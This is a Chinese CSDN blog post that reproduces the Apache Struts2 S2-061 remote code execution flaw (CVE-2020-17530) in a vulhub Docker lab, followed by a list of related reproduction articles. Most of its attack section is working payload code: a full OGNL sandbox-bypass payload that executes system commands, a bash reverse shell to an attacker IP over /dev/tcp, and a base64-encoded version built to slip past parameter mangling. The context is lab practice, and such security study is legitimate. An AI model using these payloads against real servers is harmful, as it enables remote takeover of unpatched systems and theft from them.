struts2/s2-061(vulhub复现)

最新推荐文章于 2024-06-25 08:00:00 发布
最新推荐文章于 2024-06-25 08:00:00 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: struts java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40646572/article/details/127616111
版权

s2介绍

Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
S2-061是对S2-059沙盒进行的绕过。

影响版本

Apache Struts 2.0.0 - 2.5.25

工具

使用vulhub下的docker镜像复现。

漏洞复现

在这里插入图片描述
在这里插入图片描述

手工测试确定漏洞点在id参数处。
payload=http://192.168.171.135:8080/?id=%{'tets'+(2000+20).toString()}

下一步获取使用id指令。
在这里插入图片描述

payload=?id=%25{(%23instancemanager%3d%23application['org.apache.tomcat.InstanceManager']).(%23stack%3d%23request['struts.valueStack']).(%23bean%3d%23instancemanager.newInstance('org.apache.commons.collections.BeanMap')).(%23bean.setBean(%23stack)).(%23context%3d%23bean.get('context')).(%23bean.setBean(%23context)).(%23macc%3d%23bean.get('memberAccess')).(%23bean.setBean(%23macc)).(%23emptyset%3d%23instancemanager.newInstance('java.util.HashSet')).(%23bean.put('excludedClasses',%23emptyset)).(%23bean.put('excludedPackageNames',%23emptyset)).(%23arglist%3d%23instancemanager.newInstance('java.util.ArrayList')).(%23arglist.add('id')).(%23execute%3d%23instancemanager.newInstance('freemarker.template.utility.Execute')).(%23execute.exec(%23arglist))}

shell反弹

bash -i >& /dev/tcp/192.168.171.129/8888 0>&1
base64编码后:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE3MS4xMjkvODg4OCAwPiYx}|{base64,-d}|{bash,-i}

在这里插入图片描述
使用get方式,发现总是反弹不成功,但是使用post方法,可以成功反弹。
反弹payload之所以要经过bash64转码是因为,包含空格以及一些特殊字符的参数可能会被破坏,因此需要经过转码。

在这里插入图片描述
反弹成功。

参考连接

转码连接:https://x.hacking8.com/java-runtime.html
(CVE-2020-17530)Struts2 S2-061 远程命令执行漏洞【复现】:https://blog.csdn.net/qq_45742511/article/details/115405250?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-115405250-blog-111052971.pc_relevant_recovery_v2&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-115405250-blog-111052971.pc_relevant_recovery_v2&utm_relevant_index=2

bigdogeggs
关注
专栏目录
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1143
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是javawebserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1538
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现
玄道的网安博客
12-11 7105
漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。 影响版本 Apache Struts 2.0.0 - 2.5.25 环境搭建 这里使用docker进行安装 项目地址: https://github....
Struts2 S2-061(CVE-2020-17530)漏洞复现
qq_56258713的博客
07-03 1402
Struts2 S2-061(CVE-2020-17530)漏洞复现
vulhubStruts2 S2-061 远程命令执行漏洞(CVE-2020-17530)
weixin_42884199的博客
12-07 448
前言 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload %25{(223*223)} view-source:http://192.168.150.146:8080/index.action?id=%25{(223*223)} 访
s2-061复现
qq_54030686的博客
02-27 290
s2-061复现 找个payload输入进去,替换传输方法为POST, 增加Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF 然后把payload加到下面即可在返回数据包中看见回显 复现的文章蛮多,我这里不在复现 下面介绍个人使用python编写的s2-061测试工具 以vulfocus.io中的s2-061靶场为例 输入在靶场中开启的网址即可 当然了,这个工具会放在github上,其他的工具
【漏洞复现】6.Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)复现与分析
Zichel77的博客
03-21 1495
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
struts-2.5.16-源码+示例(S2-057漏洞演示环境)
08-24
S2-057漏洞,全称为"Struts2 OGNL注入漏洞",主要源于Struts 2框架处理用户输入时的不当验证和处理。OGNL (Object-Graph Navigation Language) 是一种强大的表达式语言,用于获取和设置Java对象的属性。在Struts 2中...
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 812
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)漏洞复现
sechelper的博客
01-11 699
cve漏洞详细复现,漏洞利用,反弹shell,工具分享
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)
最新发布
qq_68163788的博客
06-25 464
Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了API,鼓励开发者采用MVC架构。Struts2WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。
vulhub-struts2
bqnagus
10-03 1606
vulhub-struts2 复现
struts2 代码执行 (CVE-2020-17530)s2-061
YouthBelief的博客
11-07 676
struts2 代码执行 (CVE-2020-17530)struts2 代码执行 (CVE-2020-17530)0x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 struts2 代码执行 (CVE-2020-17530) Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 在特定的环境下,远程攻击者通过构造 恶意的OGNL表达式 ,可造成 任意代
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)
weixin_70045024的博客
09-11 1223
Struts2 S2-061 远程命令执行漏洞(CVE-2020-17530)
vulhub系列之struts2(s2-001、s2-007、s2-008、s2-009、s2-012)
weixin_43071873的博客
11-26 1037
S2-001 远程代码执行漏洞 漏洞详情: 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行 影响版本: Struts 2.0.0 - Struts 2.0.8 漏洞复现: 测试漏洞,%{1+1} 提交后报错返回解析为
复现S2-061远程代码执行漏洞
weixin_67813445的博客
03-29 113
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
(CVE-2020-17530)Struts2 S2-061 远程命令执行漏洞复现
thelostworld
12-11 595
​ 最近一直关注Struts2 S2-061漏洞,最近忙今天才有空来复现一下这个漏洞。 Struts2 S2-061 远程命令执行漏洞复现 一、漏洞简介 Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。 二、影响版本  Apache S
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值